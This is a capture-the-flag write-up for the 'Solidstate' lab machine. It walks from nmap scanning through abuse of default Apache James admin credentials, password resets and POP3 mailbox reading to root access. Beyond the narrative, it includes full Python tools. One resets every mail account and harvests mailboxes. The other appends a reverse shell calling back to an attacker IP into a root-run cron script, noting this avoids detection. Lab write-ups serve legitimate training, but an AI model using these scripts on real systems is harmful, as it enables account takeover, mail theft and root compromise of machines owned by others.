# Solidstate

<figure><img src="/files/U22xzrjrD1NtzBuWPHDB" alt=""><figcaption></figcaption></figure>

## Enumeration

### Nmap

Run this command to list all the open ports:

```
$ nmap -p- -T5 -oN nmap/listopenports -Pn 10.10.10.51
<GOT OPEN PORTS>
```

Run this command to do a full scan against the found open ports:

```
$ nmap -A -oN nmap/fullscan -Pn -p OPEN_PORTS 10.10.10.51

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.94%I=7%D=2/5%Time=67A3BB93%P=aarch64-unknown-linux-gnu
SF:%r(GenericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.
SF:2\nPlease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nP
SF:assword:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.18 (96%), Linux 3.2 - 4.9 (96%), Linux 4.2 (96%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   23.03 ms 10.10.14.1
2   23.53 ms 10.10.10.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 264.01 seconds

```

Ports 25, 110, 119 and 4555 all belong to one application: Apache James 2.3.2 (its SMTP, POP3 and NNTP services plus the Remote Administration Tool on 4555). This version has a published RCE (below); for this writeup we will not use it and will instead get in through the administration service.

{% embed url="<https://www.exploit-db.com/exploits/35513>" %}

We'll add the IP to our `/etc/hosts` file:

```
10.10.10.51    solidstate.htb
```

### Port 80

Enumerating the website, we didn't find anything interesting. Running gobuster and feroxbuster did not turn up any interesting directories either, so we can set port 80 aside for now.

<figure><img src="/files/EaRyAeeKjxUqfxeAVf1Y" alt=""><figcaption></figcaption></figure>

### Port 4555

Using telnet, we connect to the service on port 4555. When prompted for credentials, we tried the James Remote Administration Tool's default account `root:root`, and it worked.

```
$ telnet solidstate.htb 4555
```

<figure><img src="/files/QvFWUIZCUwMEYHNddPHD" alt=""><figcaption></figcaption></figure>

We can list the existing accounts with `listusers`.

<figure><img src="/files/ypUbRhY03Y7PqS0VDyQM" alt=""><figcaption></figcaption></figure>

There are 5 accounts. Since we are root on the administration tool, we can reset any account's password with `setpassword <user> <newpassword>` and then log in as that user. James keeps its accounts in one users repository that the SMTP and POP3 services authenticate against, so a password set here is the password on ports 25 and 110 as well (the `root:root` login for 4555 itself is a separate setting in James's `config.xml`). Note that this is destructive: the users' real passwords are overwritten, which is fine on a lab box but would lock people out on a real engagement.

<figure><img src="/files/YmrYsuQpfYCKAHOY6QCr" alt=""><figcaption></figcaption></figure>

### Port 110

After resetting the passwords, we logged into the POP3 service on port 110 using `telnet`.

```
$ telnet solidstate.htb 110
```

We logged in as each user in turn (`USER <name>`, then `PASS <password>`); the most interesting find was in `mindy`'s mailbox.

<figure><img src="/files/qjJh62FP7ti1SJAqJAZm" alt=""><figcaption></figcaption></figure>

`LIST` shows the stored messages with their sizes, and `RETR <n>` retrieves the contents of message `n`.

<figure><img src="/files/kI2uP4fXAHPoTyFAaa24" alt=""><figcaption></figcaption></figure>

We can see that we found credentials for `mindy`!
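The two steps above (resetting passwords through the Remote Administration Tool on 4555, then pulling each mailbox over POP3 on 110) can be scripted. The following is an added example, not code from the writeup: the host name, ports, admin credentials and new password are assumptions, and the reply formats it parses (`Existing accounts N`, `user: <name>`, `Password for <user> reset`, POP3 `+OK`) are what James 2.3.2 prints in the screenshots above. `LineConn` can also be fed a list of constructed reply lines so the protocol logic runs offline.

```python
"""Automate the James 2.3.2 steps: reset every account via the Remote
Administration Tool (4555), then fetch each mailbox over POP3 (110).
Added example; host, ports, credentials and canned replies are assumptions."""
import re
import socket


class LineConn:
    """Line-oriented text transport over a real socket, or over a list of
    constructed reply lines so the protocol logic can be exercised offline."""

    def __init__(self, sock=None, scripted=None):
        self.sock, self.buf = sock, b""
        self.scripted = list(scripted or [])  # constructed replies (offline mode)
        self.sent = []                         # every command we issued

    def send(self, line):
        self.sent.append(line)
        if self.sock is not None:
            self.sock.sendall(line.encode() + b"\r\n")

    def readline(self):
        if self.sock is None:
            return self.scripted.pop(0) if self.scripted else None
        while b"\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                return None
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\n")
        return line.decode("latin-1").rstrip("\r")


# --- port 4555: James Remote Administration Tool ---------------------------
def james_login(conn, user, password):
    """Answer the 'Login id:' / 'Password:' prompts; True on 'Welcome <user>'."""
    line = conn.readline()
    while line is not None and not line.startswith("Login id:"):
        line = conn.readline()                 # skip the banner
    conn.send(user)
    conn.readline()                            # "Password:"
    conn.send(password)
    reply = conn.readline() or ""              # "Welcome root..." / "Login failed for root"
    return reply.startswith("Welcome")


def james_listusers(conn):
    """'listusers' replies 'Existing accounts N' then N lines of 'user: <name>'."""
    conn.send("listusers")
    header = conn.readline() or ""
    count = int(header.split()[-1]) if header.startswith("Existing accounts") else 0
    return [(conn.readline() or "").split(": ", 1)[-1] for _ in range(count)]


def james_setpassword(conn, user, new_password):
    """'setpassword <user> <pass>' replies 'Password for <user> reset' on success."""
    conn.send("setpassword %s %s" % (user, new_password))
    return (conn.readline() or "").startswith("Password for %s reset" % user)


def james_reset_all(conn, admin_user, admin_pass, new_password):
    """Log in as the admin account and reset every account to new_password.
    Destructive: the original passwords are lost, so only do this on a lab box."""
    if not james_login(conn, admin_user, admin_pass):
        raise RuntimeError("admin login rejected")
    return [u for u in james_listusers(conn) if james_setpassword(conn, u, new_password)]


# --- port 110: POP3 ----------------------------------------------------------
def _pop3_ok(conn):
    return (conn.readline() or "").startswith("+OK")


def _pop3_multiline(conn):
    """Read a multi-line response up to the lone '.', undoing byte-stuffing."""
    lines, line = [], conn.readline()
    while line is not None and line != ".":
        lines.append(line[1:] if line.startswith("..") else line)
        line = conn.readline()
    return lines


def pop3_fetch_all(conn, user, password):
    """USER/PASS, LIST, then RETR each message; returns {msg_no: text}."""
    if not _pop3_ok(conn):                     # server greeting
        raise RuntimeError("no POP3 greeting")
    for cmd in ("USER " + user, "PASS " + password, "LIST"):
        conn.send(cmd)
        if not _pop3_ok(conn):
            raise RuntimeError("POP3 rejected: " + cmd.split()[0])
    numbers = [int(l.split()[0]) for l in _pop3_multiline(conn)]
    mail = {}
    for n in numbers:
        conn.send("RETR %d" % n)
        if _pop3_ok(conn):
            mail[n] = "\n".join(_pop3_multiline(conn))
    return mail


def grep_credentials(text):
    """Lines worth a human's attention: anything mentioning a password."""
    return [l for l in text.splitlines() if re.search(r"pass(word)?", l, re.I)]


if __name__ == "__main__":
    TARGET, NEW_PASSWORD = "solidstate.htb", "Passw0rd!"   # assumed values
    with socket.create_connection((TARGET, 4555)) as s:
        users = james_reset_all(LineConn(s), "root", "root", NEW_PASSWORD)
    for user in users:
        with socket.create_connection((TARGET, 110)) as s:
            for n, msg in pop3_fetch_all(LineConn(s), user, NEW_PASSWORD).items():
                print(user, n, grep_credentials(msg))
```

The James admin protocol has no status codes, so the client has to match the tool's prose replies; `james_reset_all` only reports accounts whose reset was acknowledged, and the admin login failing (the `Login failed for` line seen in the nmap fingerprint) raises rather than silently continuing.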

## User Access

Using the credentials we found, we can log in: `mindy:P@55W0rd1!2@`

```
$ ssh mindy@solidstate.htb
```

<figure><img src="/files/js5EG0jANau7AqpM2lfH" alt=""><figcaption></figcaption></figure>

It seems as though we have user access!&#x20;

<figure><img src="/files/AH0mWhR7iAx3TWd7ebHm" alt=""><figcaption></figcaption></figure>

Unfortunately, we land in a restricted bash shell (rbash), so we do not have full freedom as the user. The restriction applies to mindy's login shell; if we hand ssh a command instead, sshd runs it through `rbash -c`, and here that is enough to start an unrestricted `bash`:

```
$ ssh mindy@solidstate.htb -t bash
```

<figure><img src="/files/5qK23J0Jjxar0F6kDApX" alt=""><figcaption></figcaption></figure>

Now, we have full shell access! BOOM! 💥

## Root Access

To escalate our privileges, we looked for sensitive files. We found a couple cron jobs running but they weren't very significant. We did find a suspicious file `/opt/tmp.py`.

Using `pspy` we checked whether root was running it regularly. Note that the target is a 32-bit machine, so we used the 32-bit build, `pspy32`:

```
$ ./pspy32
```

<figure><img src="/files/iIMgu9frWdwaRnVUE3Wj" alt=""><figcaption></figcaption></figure>

We were right! The root user (UID 0) runs this file regularly, and since `tmp.py` is writable by `mindy`, we appended a line of Python to it that connects back to us with a shell.

We used the Python reverse shell from:

{% embed url="<https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>" %}

<figure><img src="/files/HrHa1Tb1yEMvECtwvx8r" alt=""><figcaption><p>modified tmp.py</p></figcaption></figure>
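Before editing a script that root's cron runs, it is worth confirming the ownership and permissions that make the trick work, and keeping a copy of the original so it can be restored. The following is an added example, not the writeup's modified `tmp.py`: the listener address and port, the backup location and the script path are assumptions, and the appended stanza is the pentestmonkey-style reverse shell wrapped in a `try` so the cron job's existing lines keep running even when our listener is down. It is written to run under either the Python 2.7 or Python 3 interpreter cron invokes.

```python
"""Append a reverse shell to a root-run cron script after checking we can
write it and backing it up. Added example; host, port, paths are assumptions."""
import os
import shutil
import stat

# Appended verbatim to the end of the cron script, after its existing lines.
# The try/except keeps the original behaviour intact if nobody is listening.
PAYLOAD = """
# --- appended: reverse shell to %(lhost)r:%(lport)d (runs as root under cron) ---
try:
    import socket, os, pty
    _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    _s.connect((%(lhost)r, %(lport)d))
    for _fd in (0, 1, 2):
        os.dup2(_s.fileno(), _fd)
    pty.spawn("/bin/sh")
except Exception:
    pass
"""


def payload_text(lhost, lport):
    """Render the reverse-shell stanza for our listener."""
    return PAYLOAD % {"lhost": lhost, "lport": int(lport)}


def mode_report(st_mode, st_uid, my_uid):
    """Classify a stat() result: is this a root-owned script that others can edit?"""
    return {
        "root_owned": st_uid == 0,
        "world_writable": bool(st_mode & stat.S_IWOTH),
        "mine": st_uid == my_uid,
    }


def tamper_check(path):
    """Live check of a candidate cron script; raises unless we can write it."""
    st = os.stat(path)
    report = mode_report(st.st_mode, st.st_uid, os.getuid())
    report["writable_by_me"] = os.access(path, os.W_OK)
    if not report["writable_by_me"]:
        raise OSError("%s is not writable by uid %d" % (path, os.getuid()))
    return report


def backdoor_cron_script(path, lhost, lport, backup_dir=os.path.expanduser("~")):
    """Back up the script (in our home, not /tmp), then append the payload.
    Returns the backup path so the original can be restored afterwards."""
    tamper_check(path)
    backup = os.path.join(backup_dir, os.path.basename(path) + ".orig")
    shutil.copy2(path, backup)
    with open(path, "a") as f:
        f.write(payload_text(lhost, lport))
    return backup


if __name__ == "__main__":
    # Run as mindy on the box; assumed listener address, port and script path.
    print(backdoor_cron_script("/opt/tmp.py", "10.10.14.8", 1234))
```

Appending rather than overwriting matters: the cron job keeps doing whatever it did before, which is less likely to be noticed, and the `.orig` copy lets you put the file back once you have root.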

We started our listener:

```
$ nc -lvnp 1234
```

<figure><img src="/files/sBgucOZeux1ICI0udu04" alt=""><figcaption></figcaption></figure>

We got a hit! BOOM! 💥

Just like that, we have pwned this box! ✅

